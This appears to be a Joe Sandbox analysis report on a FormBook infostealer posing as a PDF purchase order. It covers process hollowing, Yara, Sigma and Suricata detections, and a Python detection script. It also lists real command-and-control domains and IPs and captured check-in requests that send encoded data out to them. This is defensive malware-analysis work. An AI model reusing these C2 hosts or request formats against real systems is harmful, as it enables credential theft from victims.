Windows Analysis Report
PO-78140924.BAT.PDF.exe

Overview

General Information

Sample name: PO-78140924.BAT.PDF.exe
Analysis ID: 1519457
MD5: 0c3d90f3a7607383e1e4a5da779b23f2
SHA1: bf3452b178fe50a53d94498cd2efc777c993954b
SHA256: 4b3d9e2b4d5af94fe3953942fe920f42c3928a7c4c9d5ccd841bd1fac367690e
Tags: exe, user-TeamDreier

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • PO-78140924.BAT.PDF.exe (PID: 1560, cmdline: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", MD5: 0C3D90F3A7607383E1E4A5DA779B23F2)
    • svchost.exe (PID: 3192, cmdline: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • YKkstfciYBQ.exe (PID: 2556, cmdline: "C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe", MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mstsc.exe (PID: 6048, cmdline: "C:\Windows\SysWOW64\mstsc.exe", MD5: EA4A02BE14C405327EEBA8D9AD2BD42C)
          • firefox.exe (PID: 5768, cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe", MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Notes on the tree: svchost.exe (PID 3192) is the genuine SysWOW64 binary (MD5 1ED18311...) but runs with the loader's own path as its command line; together with the "creates a process in suspended mode", "writes to foreign memory regions" and "modifies the context of a thread in another process" signatures and the FormBook Yara hits at 0x400000 inside process 2, this is the classic hollowed-host pattern, not a legitimate service host. YKkstfciYBQ.exe carries the PDB path R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb (see the binary strings below), so it is the sandbox's decoy browser process rather than a file dropped by the sample; mstsc.exe (process 4) is the injected host that holds the FormBook payload in memory and performs the credential harvesting and C2 traffic.

No configs have been found
Yara matches in memory dumps (Source | Rule | Description | Author, matched strings indented below each entry)

00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bec0: $a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1404f: $a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2bec0: $a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1404f: $a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(remaining memory-dump entries not shown in this extract)

Yara matches in unpacked PE files (Source | Rule | Description | Author, matched strings indented below each entry)

2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e443: $a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x165d2: $a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f243: $a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x173d2: $a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Sigma matches

Source: Process started
Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)
Data: Command: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", CommandLine: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe, NewProcessName: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe, OriginalFileName: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", ProcessId: 1560, ProcessName: PO-78140924.BAT.PDF.exe

Source: Process started
Author: Florian Roth (Nextron Systems)
Data: Command: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", CommandLine: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", ParentImage: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe, ParentProcessId: 1560, ParentProcessName: PO-78140924.BAT.PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", ProcessId: 3192, ProcessName: svchost.exe

Source: Process started
Author: vburov
Data: Command: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", CommandLine: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", ParentImage: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe, ParentProcessId: 1560, ParentProcessName: PO-78140924.BAT.PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe", ProcessId: 3192, ProcessName: svchost.exe
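The three process-creation indicators visible in the Sigma data above (a lure extension hidden before the real .exe, svchost.exe started by something other than its normal service-control parent, and a command line that names a different executable than the image actually running) can be reproduced as host-side checks. The following Python is an added example, not part of the Joe Sandbox report or of the Sigma rules it cites; the event dictionaries are constructed from the fields shown above plus one benign svchost start for contrast, and the svchost parent allow-list and lure-extension list are assumptions to be tuned for a real estate.

```python
"""Process-creation heuristics for the indicators in this report's Sigma hits.

Added example (not from the Joe Sandbox report or the cited Sigma rules).
Assumptions: Sysmon/4688-style field names; SVCHOST_PARENTS and LURE_EXT are
starting points, not authoritative lists.
"""
import ntpath
import re

EXEC_EXT = {"exe", "scr", "com", "pif"}            # final extension that actually executes
LURE_EXT = {"pdf", "doc", "docx", "xls", "xlsx",    # extensions a user reads as harmless
            "txt", "jpg", "png", "rtf", "zip", "bat"}
SVCHOST_PARENTS = {"services.exe", "msmpeng.exe"}   # assumed legitimate svchost.exe parents

_FIRST_TOKEN = re.compile(r'^\s*(?:"([^"]*)"|(\S+))')


def double_extension(image):
    """True for names like PO-78140924.BAT.PDF.exe: a lure extension before an executable one."""
    parts = ntpath.basename(image).lower().split(".")
    if len(parts) < 3 or parts[-1] not in EXEC_EXT:
        return False
    return any(p in LURE_EXT for p in parts[1:-1])


def cmdline_image(cmdline):
    """Return the executable the command line claims to run (first token, quotes stripped)."""
    m = _FIRST_TOKEN.match(cmdline or "")
    if not m:
        return ""
    return m.group(1) if m.group(1) is not None else m.group(2)


def assess(event):
    """Return the indicator names that fire on one process-creation event, in fixed order."""
    findings = []
    image = event.get("Image", "")
    if double_extension(image):
        findings.append("double_extension")
    if ntpath.basename(image).lower() == "svchost.exe":
        parent = ntpath.basename(event.get("ParentImage", "")).lower()
        if parent not in SVCHOST_PARENTS:
            findings.append("uncommon_svchost_parent")
    # A hollowed host shows up as image-on-disk != executable named in the command
    # line (here: svchost.exe running with the loader's path as its command line).
    claimed = cmdline_image(event.get("CommandLine", ""))
    if claimed and ntpath.normcase(claimed) != ntpath.normcase(image):
        findings.append("cmdline_image_mismatch")
    return findings


def triage(events):
    """Map ProcessId -> findings for every event that fires at least one indicator."""
    result = {}
    for event in events:
        findings = assess(event)
        if findings:
            result[event["ProcessId"]] = findings
    return result


# Constructed events modelled on the two Sigma "Process started" entries above,
# plus one benign svchost.exe start (constructed) for contrast.
SAMPLE_EVENTS = [
    {"ProcessId": 1560, "ParentProcessId": 1028,
     "Image": r"C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe",
     "CommandLine": r'"C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe"',
     "ParentImage": ""},
    {"ProcessId": 3192, "ParentProcessId": 1560,
     "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "CommandLine": r'"C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe"',
     "ParentImage": r"C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe"},
    {"ProcessId": 900, "ParentProcessId": 700,
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]

if __name__ == "__main__":
    for pid, findings in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(findings))
```

The image/command-line comparison is the check worth keeping even where the Sigma rules are already deployed: it is independent of the parent allow-list and fires on any hollowed host, whichever system binary the loader picks.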
Suricata alerts, SID 2050745 (ET MALWARE FormBook CnC Checkin (GET) M5), severity 1, classtype "Malware Command and Control Activity Detected":

Timestamp                       | Source IP   | Src port | Destination IP  | Dst port | Protocol
2024-09-26T15:22:25.684016+0200 | 192.168.2.5 | 49709    | 81.88.63.46     | 80       | TCP
2024-09-26T15:22:49.195322+0200 | 192.168.2.5 | 49713    | 217.70.184.50   | 80       | TCP
2024-09-26T15:23:02.624619+0200 | 192.168.2.5 | 49718    | 172.96.187.60   | 80       | TCP
2024-09-26T15:23:16.977869+0200 | 192.168.2.5 | 49722    | 3.33.130.190    | 80       | TCP
2024-09-26T15:23:31.454204+0200 | 192.168.2.5 | 49727    | 67.223.117.189  | 80       | TCP
2024-09-26T15:24:06.264764+0200 | 192.168.2.5 | 49731    | 103.248.137.209 | 80       | TCP
2024-09-26T15:24:27.494268+0200 | 192.168.2.5 | 49735    | 3.33.130.190    | 80       | TCP
2024-09-26T15:24:40.651608+0200 | 192.168.2.5 | 49739    | 3.33.130.190    | 80       | TCP
2024-09-26T15:24:54.672159+0200 | 192.168.2.5 | 49743    | 85.153.138.113  | 80       | TCP

Suricata alerts, SID 2855465 (ETPRO MALWARE FormBook CnC Checkin (GET) M2), severity 1, classtype "A Network Trojan was detected": fired on exactly the same nine flows, with identical timestamps, as SID 2050745 above.

Suricata alerts, SID 2855464 (ETPRO MALWARE FormBook CnC Checkin (POST) M3), severity 1, classtype "A Network Trojan was detected":

Timestamp                       | Source IP   | Src port | Destination IP  | Dst port | Protocol
2024-09-26T15:22:41.399078+0200 | 192.168.2.5 | 49710    | 217.70.184.50   | 80       | TCP
2024-09-26T15:22:43.918437+0200 | 192.168.2.5 | 49711    | 217.70.184.50   | 80       | TCP
2024-09-26T15:22:46.510005+0200 | 192.168.2.5 | 49712    | 217.70.184.50   | 80       | TCP
2024-09-26T15:22:54.968757+0200 | 192.168.2.5 | 49714    | 172.96.187.60   | 80       | TCP
2024-09-26T15:22:57.503736+0200 | 192.168.2.5 | 49716    | 172.96.187.60   | 80       | TCP
2024-09-26T15:23:00.059704+0200 | 192.168.2.5 | 49717    | 172.96.187.60   | 80       | TCP
2024-09-26T15:23:08.176919+0200 | 192.168.2.5 | 49719    | 3.33.130.190    | 80       | TCP
2024-09-26T15:23:11.813069+0200 | 192.168.2.5 | 49720    | 3.33.130.190    | 80       | TCP
2024-09-26T15:23:13.466122+0200 | 192.168.2.5 | 49721    | 3.33.130.190    | 80       | TCP
2024-09-26T15:23:22.709740+0200 | 192.168.2.5 | 49724    | 67.223.117.189  | 80       | TCP
2024-09-26T15:23:25.262284+0200 | 192.168.2.5 | 49725    | 67.223.117.189  | 80       | TCP
2024-09-26T15:23:27.824971+0200 | 192.168.2.5 | 49726    | 67.223.117.189  | 80       | TCP
2024-09-26T15:23:38.628177+0200 | 192.168.2.5 | 49728    | 103.248.137.209 | 80       | TCP
2024-09-26T15:23:41.173987+0200 | 192.168.2.5 | 49729    | 103.248.137.209 | 80       | TCP
2024-09-26T15:23:43.720757+0200 | 192.168.2.5 | 49730    | 103.248.137.209 | 80       | TCP
2024-09-26T15:24:19.848287+0200 | 192.168.2.5 | 49732    | 3.33.130.190    | 80       | TCP
2024-09-26T15:24:22.382753+0200 | 192.168.2.5 | 49733    | 3.33.130.190    | 80       | TCP
2024-09-26T15:24:24.949810+0200 | 192.168.2.5 | 49734    | 3.33.130.190    | 80       | TCP
2024-09-26T15:24:32.994875+0200 | 192.168.2.5 | 49736    | 3.33.130.190    | 80       | TCP
2024-09-26T15:24:35.552839+0200 | 192.168.2.5 | 49737    | 3.33.130.190    | 80       | TCP
2024-09-26T15:24:38.092661+0200 | 192.168.2.5 | 49738    | 3.33.130.190    | 80       | TCP
2024-09-26T15:24:46.627043+0200 | 192.168.2.5 | 49740    | 85.153.138.113  | 80       | TCP
2024-09-26T15:24:49.258935+0200 | 192.168.2.5 | 49741    | 85.153.138.113  | 80       | TCP
2024-09-26T15:24:51.979677+0200 | 192.168.2.5 | 49742    | 85.153.138.113  | 80       | TCP
2024-09-26T15:25:00.942005+0200 | 192.168.2.5 | 49744    | 172.67.165.25   | 80       | TCP
2024-09-26T15:25:03.909947+0200 | 192.168.2.5 | 49745    | 172.67.165.25   | 80       | TCP
2024-09-26T15:25:07.014255+0200 | 192.168.2.5 | 49746    | 172.67.165.25   | 80       | TCP

Read together, the timestamps show the sample working through its C2 list one host at a time: three POST check-ins to a destination, then one GET check-in to the same destination, before moving on to the next (the first destination, 81.88.63.46, receives only the GET, and the capture ends after the three POSTs to 172.67.165.25).

            AV Detection

Source: PO-78140924.BAT.PDF.exe | Avira: detected
Source: PO-78140924.BAT.PDF.exe | ReversingLabs: Detection: 79%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.3895831173.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3897012807.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3897058690.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2158074372.0000000003B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2157680976.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2158514500.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3897432800.0000000002360000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted sample | Integrated Neural Analysis Model: matched with 100.0% probability
Source: PO-78140924.BAT.PDF.exe | Joe Sandbox ML: detected
Source: PO-78140924.BAT.PDF.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: YKkstfciYBQ.exe, 00000003.00000000.2070305149.000000000077E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP | source: PO-78140924.BAT.PDF.exe, 00000000.00000003.2042653624.0000000004540000.00000004.00001000.00020000.00000000.sdmp, PO-78140924.BAT.PDF.exe, 00000000.00000003.2041650984.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046417159.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048886154.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2158145354.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2170653792.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2164958755.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: PO-78140924.BAT.PDF.exe, 00000000.00000003.2042653624.0000000004540000.00000004.00001000.00020000.00000000.sdmp, PO-78140924.BAT.PDF.exe, 00000000.00000003.2041650984.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2046417159.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048886154.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2158145354.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000004.00000002.3897347942.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2170653792.0000000000DAF000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897347942.000000000468E000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000004.00000003.2164958755.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mstsc.pdbGCTL | source: svchost.exe, 00000002.00000003.2115002578.0000000007300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2115127900.0000000007500000.00000004.00000020.00020000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000003.2094204761.0000000003D42000.00000004.00000001.00020000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000003.2093852104.0000000003C02000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: svchost.pdb | source: YKkstfciYBQ.exe, 00000003.00000002.3899395542.0000000003EDC000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000004B1C000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2459301249.000000003282C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: mstsc.pdb | source: svchost.exe, 00000002.00000003.2115002578.0000000007300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2115127900.0000000007500000.00000004.00000020.00020000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000003.2094204761.0000000003D42000.00000004.00000001.00020000.00000000.sdmp, YKkstfciYBQ.exe, 00000003.00000003.2093852104.0000000003C02000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: YKkstfciYBQ.exe, 00000003.00000002.3899395542.0000000003EDC000.00000004.80000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3897855714.0000000004B1C000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000004.00000002.3896033202.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000006.00000002.2459301249.000000003282C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\PO-78140924.BAT.PDF.exe | Code function: 0_2_0007449B GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_0049C460 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_00489C00: 4x nop then xor eax, eax
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_0048E012: 4x nop then pop edi
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4_2_00E504DE: 4x nop then mov ebx, 00000004h

            Networking

Source: Network traffic | Suricata IDS alerts (all severity 1, all from 192.168.2.5 to TCP port 80; source ports listed per destination)

2855464 - ETPRO MALWARE FormBook CnC Checkin (POST) M3:
  :49710, :49711, :49712 -> 217.70.184.50:80
  :49714, :49716, :49717 -> 172.96.187.60:80
  :49719, :49720, :49721, :49732, :49733, :49734, :49736, :49737, :49738 -> 3.33.130.190:80
  :49724, :49725, :49726 -> 67.223.117.189:80
  :49728, :49729, :49730 -> 103.248.137.209:80
  :49740, :49741, :49742 -> 85.153.138.113:80
  :49744, :49745, :49746 -> 172.67.165.25:80

2050745 - ET MALWARE FormBook CnC Checkin (GET) M5, and 2855465 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 (both fire on each of the following flows):
  :49709 -> 81.88.63.46:80
  :49713 -> 217.70.184.50:80
  :49718 -> 172.96.187.60:80
  :49722, :49735, :49739 -> 3.33.130.190:80
  :49727 -> 67.223.117.189:80
  :49731 -> 103.248.137.209:80
  :49743 -> 85.153.138.113:80
Source: DNS query | www.heldhold.xyz
Source: Joe Sandbox View | IP Address: 67.223.117.189
Source: Joe Sandbox View | IP Address: 217.70.184.50
Source: Joe Sandbox View | ASN Name: VIMRO-AS15189US
Source: Joe Sandbox View | ASN Name: SINGLEHOP-LLCUS
Source: Joe Sandbox View | ASN Name: DNC-ASDimensionNetworkCommunicationLimitedHK
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 occurrences)
Source: global traffic | HTTP traffic detected: nine GET requests. All nine carry the same header set and differ only in the request line and Host:

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36

Host: www.2bhp.com
  GET /a4ar/?vf5pwn=bigEPZ6XMKFUrjbkOOF/tc1QSeZpy4rj9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOCaAaQ3Lxux4SSFbsDgkYjgjAaiC5myZdzdYIguvdh1gvDg==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
Host: www.ultraleap.net
  GET /8pln/?vf5pwn=T9/DtY4QstE2hf5N+QbDCp08BY0+/KIvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9qM2494p5Ur94ranWdRPLWWfdK4ZvNUpqMUToNubzG0SM8g==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
Host: www.dalong.site
  GET /v2c3/?lHul=nfQTqL40vDEpIp30&vf5pwn=4KW7rJi8xQgG5JuhUUy4oHXtvgFnSuEzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxet5jRO5AJzixTprPi8JCHFDrvphN2mQYrYWI0Ljg/1k5GCA== HTTP/1.1
Host: www.mgeducacaopro.online
  GET /xamn/?vf5pwn=eI40u+kXl6dCNOxtOqaVh3t2St2MUXLKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR4W4fWnAv/fqpdm4W58wxIsvJOF8/cGdHH0QztCYqDUNhvQ==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
Host: www.heldhold.xyz
  GET /fava/?lHul=nfQTqL40vDEpIp30&vf5pwn=GCDZpLqdSYk7fT5BaAxVCvWfN8QL3LUdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQAngPiIKVJBW1l0NVsB5cz1lTXdEnKbnDfocvymGyGvQBrQ== HTTP/1.1
Host: www.63582.photo
  GET /5o7d/?vf5pwn=zMeRclQqEZ6cHEkv6r3h6rNdPeIv0NfXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGdsHlq0LOSSwDS14egmHnY5/1aPOe4+/4uS5IVfZSCCmkbAw==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
Host: www.asiapartnars.online
  GET /kt2f/?vf5pwn=3qIRfQl/AKdo1myXluGCiikgEIMzjkfYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfHO+i2Ne6X81cG7kNzDpu31X3NSjbrBV+9ESn2I73xzu4qQ==&lHul=nfQTqL40vDEpIp30 HTTP/1.1
Host: www.linkwave.cloud
  GET /al6z/?lHul=nfQTqL40vDEpIp30&vf5pwn=VRCNh0NW0GgzXjJ+E9kBcAqzCeGDRYuLK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cpu7tsWuW3JQaVwptT6evyL2oGhO/bgF+68v7eWhteCSlc6A== HTTP/1.1
Host: www.mfgarage.net
  GET /3lu7/?vf5pwn=nzWofdhWpyQTuQkAURoZiOuSpDDcsuZ4SJ26h7kwykQFM8AQx5IfrLSrYivs6QFJHI8FrKvcoPkOi5L1XFRCJcPncARSRGAtt0+HcJ3GcQEnXiNUfFJGdHJ4JUWSbdHV9w==&lHul=nfQTqL40vDEpIp30 HTTP/1.1

The shape is constant across all nine hosts: a four-character path, a lHul parameter whose 16-character value (nfQTqL40vDEpIp30) never changes, a vf5pwn parameter carrying a different 132-character base64 blob each time (the two parameters appear in either order), and a User-Agent claiming Chrome 46 on Linux from a Windows host.
            Source: global traffic | DNS traffic detected: DNS query: www.2bhp.com
            Source: global traffic | DNS traffic detected: DNS query: www.ultraleap.net
            Source: global traffic | DNS traffic detected: DNS query: www.dalong.site
            Source: global traffic | DNS traffic detected: DNS query: www.mgeducacaopro.online
            Source: global traffic | DNS traffic detected: DNS query: www.heldhold.xyz
            Source: global traffic | DNS traffic detected: DNS query: www.63582.photo
            Source: global traffic | DNS traffic detected: DNS query: www.useanecdotenow.tech
            Source: global traffic | DNS traffic detected: DNS query: www.asiapartnars.online
            Source: global traffic | DNS traffic detected: DNS query: www.linkwave.cloud
            Source: global traffic | DNS traffic detected: DNS query: www.mfgarage.net
            Source: global traffic | DNS traffic detected: DNS query: www.b5x7vk.agency
            Source: unknown | HTTP traffic detected:
                POST /8pln/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate
                Host: www.ultraleap.net
                Origin: http://www.ultraleap.net
                Content-Length: 207
                Content-Type: application/x-www-form-urlencoded
                Cache-Control: no-cache
                Connection: close
                Referer: http://www.ultraleap.net/8pln/
                User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
